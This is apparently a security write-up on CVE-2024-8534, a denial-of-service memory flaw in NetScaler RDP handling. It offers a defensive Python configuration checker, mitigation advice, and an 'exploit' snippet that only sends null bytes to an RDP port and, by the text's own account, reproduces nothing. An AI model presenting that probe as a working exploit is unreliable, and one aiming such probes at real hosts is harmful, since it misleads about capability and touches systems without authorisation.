A newly disclosed memory safety vulnerability, CVE-2024-8534, affects NetScaler ADC and NetScaler Gateway appliances and can lead to memory corruption and denial of service. It applies only to appliances in one of three configurations: a Gateway (VPN Vserver) with the RDP feature enabled; a Gateway (VPN Vserver) with an RDP Proxy Server Profile created and bound to that Gateway; or an Auth Server (AAA Vserver) with the RDP feature enabled. Appliances in none of these configurations are outside the scope of the advisory.

Details on CVE-2024-8534

CVE-2024-8534 stems from improper memory handling in the RDP processing pipeline of NetScaler ADC and Gateway. While handling RDP requests, the appliance mishandles data held in memory, which corrupts memory and can crash the affected process. The practical impact is availability: an exploited appliance can become unresponsive or restart, interrupting the remote access and authentication services it fronts.
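Before patching, it helps to know whether an appliance is actually in one of the three affected configurations. As an added example (not part of the original write-up and not Citrix tooling), the following Python check parses an exported NetScaler configuration and reports which of the three preconditions it matches. The ns.conf excerpt is constructed, and the command spellings ("enable ns feature RDPProxy", "add rdp serverprofile", "-rdpServerProfileName") are assumptions about the NetScaler CLI that should be confirmed against a real "show ns runningConfig" dump.

```python
import re

# Constructed ns.conf excerpt for illustration; not copied from any real appliance.
# Command spellings (enable ns feature RDPProxy, add rdp serverprofile,
# -rdpServerProfileName) are assumed to match the NetScaler CLI. Confirm them
# against `show ns runningConfig` on your own appliance before trusting the result.
SAMPLE_NS_CONF = """\
enable ns feature LB SSL SSLVPN AAA RDPProxy
add vpn vserver gw_vpn SSL 10.0.0.10 443
add rdp serverprofile rdp_srv -rdpIP 10.0.0.10 -rdpPort 3389
set vpn vserver gw_vpn -rdpServerProfileName rdp_srv
add authentication vserver aaa_vs SSL 10.0.0.11 443
"""

GATEWAY_RDP_FEATURE = "Gateway (VPN Vserver) with RDP feature enabled"
GATEWAY_RDP_PROFILE = "Gateway (VPN Vserver) with RDP Proxy Server Profile bound"
AAA_RDP_FEATURE = "Auth Server (AAA Vserver) with RDP feature enabled"


def parse_ns_conf(text):
    """Extract only the facts the three CVE-2024-8534 preconditions depend on."""
    facts = {
        "rdp_feature": False,
        "vpn_vservers": set(),
        "aaa_vservers": set(),
        "rdp_server_profiles": set(),
        "bound_profiles": {},  # vpn vserver name -> rdp server profile name
    }
    for raw in text.splitlines():
        tokens = raw.strip().split()
        if not tokens or tokens[0].startswith("#"):
            continue
        if tokens[:3] == ["enable", "ns", "feature"]:
            # One line may enable several features; names are case-insensitive on the CLI.
            if any(t.lower() == "rdpproxy" for t in tokens[3:]):
                facts["rdp_feature"] = True
        elif tokens[:3] == ["add", "vpn", "vserver"] and len(tokens) > 3:
            facts["vpn_vservers"].add(tokens[3])
        elif tokens[:3] == ["add", "authentication", "vserver"] and len(tokens) > 3:
            facts["aaa_vservers"].add(tokens[3])
        elif tokens[:3] == ["add", "rdp", "serverprofile"] and len(tokens) > 3:
            facts["rdp_server_profiles"].add(tokens[3])
        # The server profile can be bound on the `add` line or later with `set`.
        if tokens[0] in ("add", "set") and tokens[1:3] == ["vpn", "vserver"] and len(tokens) > 3:
            m = re.search(r"-rdpServerProfileName\s+(\S+)", raw, re.IGNORECASE)
            if m:
                facts["bound_profiles"][tokens[3]] = m.group(1)
    return facts


def affected_configurations(text):
    """Return the advisory preconditions (in a fixed order) that the config satisfies."""
    f = parse_ns_conf(text)
    hits = []
    if f["rdp_feature"] and f["vpn_vservers"]:
        hits.append(GATEWAY_RDP_FEATURE)
    # Second precondition: profile both created and bound to an existing Gateway vserver.
    if any(
        vs in f["vpn_vservers"] and prof in f["rdp_server_profiles"]
        for vs, prof in f["bound_profiles"].items()
    ):
        hits.append(GATEWAY_RDP_PROFILE)
    if f["rdp_feature"] and f["aaa_vservers"]:
        hits.append(AAA_RDP_FEATURE)
    return hits


if __name__ == "__main__":
    matches = affected_configurations(SAMPLE_NS_CONF)
    if matches:
        print("Configuration matches CVE-2024-8534 preconditions:")
        for m in matches:
            print("  -", m)
    else:
        print("No CVE-2024-8534 precondition matched; RDP features are not in use.")
```

Run it over a saved ns.conf or the output of "show ns runningConfig". A non-empty result means the appliance sits in one of the advisory's affected configurations and needs the fixed build; an empty result means the RDP preconditions are absent, which is worth recording as evidence when triaging a fleet.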

Exploitation Details

Exploitation requires the RDP feature, or a bound RDP Proxy Server Profile, to be enabled on the targeted NetScaler ADC or Gateway appliance; an appliance without those configurations does not expose the affected code path. The snippet below does not reproduce the memory corruption itself. It opens a TCP connection to the RDP listener, sends a fixed 32-byte payload, and reports whether anything came back, so a reply only confirms that a listener answered on that port, not that the appliance is vulnerable or that memory was corrupted.

Proof-of-Concept Code Snippet

import socket

def exploit(ip, port):
    # Fixed 32-byte payload from the original snippet. It is not a structured
    # RDP/X.224 connection request, so a reply only shows that a listener answered.
    crafted_request = b"\x00" * 32

    try:
        print(f"[+] Sending crafted RDP request to {ip}:{port}")
        # create_connection() handles the connect and timeout; the with-block closes the socket.
        with socket.create_connection((ip, port), timeout=5) as s:
            s.sendall(crafted_request)  # sendall() retries until every byte is written
            response = s.recv(1024)
        if response:
            print(f"[+] RDP reply received from {ip}:{port} ({len(response)} bytes)")
            return True
        print(f"[-] No RDP reply received from {ip}:{port}")
        return False
    except OSError as e:
        # Covers connection refused, timeouts and resets (socket.timeout is an OSError).
        print(f"[-] Exception: {e}")
        return False

if __name__ == "__main__":
    target_ip = "192.168.1.10"  # placeholder target from the original snippet
    target_port = 3389

    exploit(target_ip, target_port)

Original References and Mitigation

Citrix has acknowledged the vulnerability in its security bulletin (CTX282540) and released fixed builds that correct the memory handling in the RDP processing components. Administrators running NetScaler ADC or Gateway in any of the affected configurations should upgrade to a fixed build promptly, and should verify after the upgrade that the running version matches the fixed release listed in the bulletin.

Link to Citrix Security Advisory: CTX282540 - Memory safety vulnerability in RDP proxy features of Citrix ADC and Gateway

Conclusion

Memory safety vulnerabilities like CVE-2024-8534 can have significant consequences for organizations that depend on the affected products, since a crash of the Gateway or AAA service takes remote access and authentication offline with it. Addressing such issues as soon as fixed builds are available is the most effective way to prevent service interruptions. Users of NetScaler ADC and Gateway devices in the affected configurations should apply the fix provided by Citrix to remove the risk of exploitation.

Timeline

Published on: 11/12/2024 19:15:18 UTC
Last modified on: 11/21/2024 17:15:26 UTC